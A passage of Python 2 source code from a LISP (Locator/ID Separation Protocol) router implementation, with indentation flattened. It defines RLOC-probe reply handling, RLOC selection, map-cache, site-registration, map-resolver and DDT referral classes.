from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
def process_rloc_probe_reply(self, nonce, eid, group, hop_count, ttl):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
rloc.last_rloc_probe_reply = lisp_get_timestamp()
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
rloc.store_rloc_probe_hops(hop_count, ttl)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hop_count) + "/" + str(ttl)))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
class lisp_mapping():
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(ttl/3600) + " hours"
else:
ttl = str(ttl * 60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
return(elapsed >= self.map_cache_ttl)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
#endif
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
# and best list. We need to set the timestamp last_rloc_probe or
# lisp_process_rloc_probe_timer() will think the unreach RLOC went
# down and is waiting for an RLOC-probe reply (it will never get).
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
# Put RLOC in lisp.lisp_rloc_probe_list if doesn't exist. And if
# we removed the RLOC out of the best list, we need to remove
# references.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
if (length is 0):
self.stats.increment(len(packet))
return([None, None, None, self.action, None, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
#
rloc = self.best_rloc_set[hashval % length]
#
# IF this RLOC is not in up state but was taken out of up state by
# not receiving echoed-nonces, try requesting again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
# Find a reachabile RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (lisp_rle_list.has_key(rloc.rle_name)):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle, None])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None,
None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
# Check to see if we are requesting an nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None, rloc])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
if (rloc.translated_port != 0): break
#endfor
#endif
if (rloc != None): rloc.stats.increment(len(packet.packet))
self.stats.increment(len(packet.packet))
#enddef
def rtrs_in_rloc_set(self):
for rloc in self.rloc_set:
if (rloc.is_rtr()): return(True)
#endfor
return(False)
#enddef
#endclass
class lisp_dynamic_eid():
def __init__(self):
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.interface = None
self.last_packet = None
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#enddef
def get_timeout(self, interface):
try:
lisp_interface = lisp_myinterfaces[interface]
self.timeout = lisp_interface.dynamic_eid_timeout
except:
self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
#endtry
#enddef
#endclass
class lisp_group_mapping():
def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
self.group_name = group_name
self.group_prefix = group_prefix
self.use_ms_name = ms_name
self.sources = sources
self.rle_address = rle_addr
#enddef
def add_group(self):
lisp_group_mapping_list[self.group_name] = self
#enddef
#endclass
lisp_site_flags = {
"P": "ETR is {}Requesting Map-Server to Proxy Map-Reply",
"S": "ETR is {}LISP-SEC capable",
"I": "xTR-ID and site-ID are {}included in Map-Register",
"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site():
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid():
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in self.individual_registrations.values():
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
#endif
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is a RLOC-name for
# the RLE, clear it from the merged registration. We want names to
# be per RLE entry and not the RLOC record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in self.individual_registrations.values():
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (new_rle.has_key(addr)): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
if (old_rle.keys() == new_rle.keys()): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
old_rle.keys(), new_rle.keys()))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special case details for
# longest match looks for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr():
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_mr() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in lisp_map_resolvers_list.values():
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (lisp_map_resolvers_list.has_key(key) == False): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
class lisp_ddt_root():
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in self.referral_set.values():
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
